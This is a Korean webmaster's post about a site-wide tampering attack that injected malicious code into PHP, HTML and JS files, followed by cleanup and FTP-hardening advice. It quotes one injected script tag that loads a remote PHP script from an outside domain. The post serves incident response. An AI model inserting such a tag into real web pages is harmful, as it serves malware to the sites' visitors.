스크립을 이용한 변조방법

iframe을 이용한 변조도 당해봐서 그 황당함을 익히 알고 있는데

어재 앗하는 순간에 당했습니다.

저번은 중국계 ~.cn 도메인에 index또는 main그리고 확장자는 html 파일과 php

파일이 주요 변조 대상이었는대 반해 이번 패턴은

파일명이 index와 main,top 같은 주요 파일이 변조 대상에 포함 시키면서

html 파일은 거진 모두 변조 시키면서 php파일은 main/index/top 등 웹구동 주요 파일을

변조 시키고 JS파일까지 변조시키기 때문에 아주 저질 스러운 방법을 택하고 있습니다.

그리고 img 또는 imges 폴더 그리고 이미지만 저장되어 있는 폴더에는 gifimg.php라는

악성코드가 담긴 파일을 생성합니다. 폴더의 경우 imges라는 폴더에 nhx라는 폴더를 생성합니다.


php파일의 경우 <? 악성코드 ?> 이런 방식으로 첫번째줄에 선언을 하며 해당 파일이

구동하는 웹페이지는 구동이 불가능하게 되며 PHP오류가 생기게 됩니다.

아마 접속하는 사람들에게 악성코드를 유포하는대에 목적이 있지 않나 합니다.

js 파일의 경우 코드 재일 아랫줄에 특정 자바 스크립이 실행 되도록하며

html파일도 동일한 패턴으로 변조가 되며 코드는 </head>뒷부분에 자바스크립 방식으로

삽입됩니다. 아마도 아이프레임 보다는 더욱 악질적으로 적용되는 듯 합니다.


ex)
<script src=http://topofthelinesunglasses.com/ext/add_checkout_success.php ></script>

대처방식은 iframe 변조와 동일한 방법으로 대처가 가능합니다만

백업이 안되어 있으시면 최근 변경된 파일을 검색하신뒤 하나하나 악성코드를 제거해 주셔야 합니다.

추천해드리는 대처 방식은 문제 발생시 ELCAP으로 21번 포트를 닫아 주시고 작업하시는 PC에

바이러스가 있지 않은지 백신으로 스켄을 해주신뒤

FTP 패스를 변경후 원격 접속으로 최근 변경된 파일리스트를 뽑아 정상 파일들로 백업 또는

악성코드를 지워 주셔야 합니다.

다 지워 주시면 다시한번 ftp 비밀번호를 한번더 바꿔 주시면 괜찮을 듯 합니다.
---------------------------------------------------------------------------------
서비스중인 사이트의 90%에 가깝게 위의 악성코드에 당해, 그에 대한 글 남깁니다.
이미 걸린상태라면 *.php/ *.htm / *.html / *.js 파일을 받아 악성코드를 삭제후
퍼미션을 555로 맞추어줍니다.

일단 우의 해결책 말고 딱히 찾아낸 해결책이 없네요.

혹시 이에 대한 공격에 아신다면 피드백 부탁드립니다.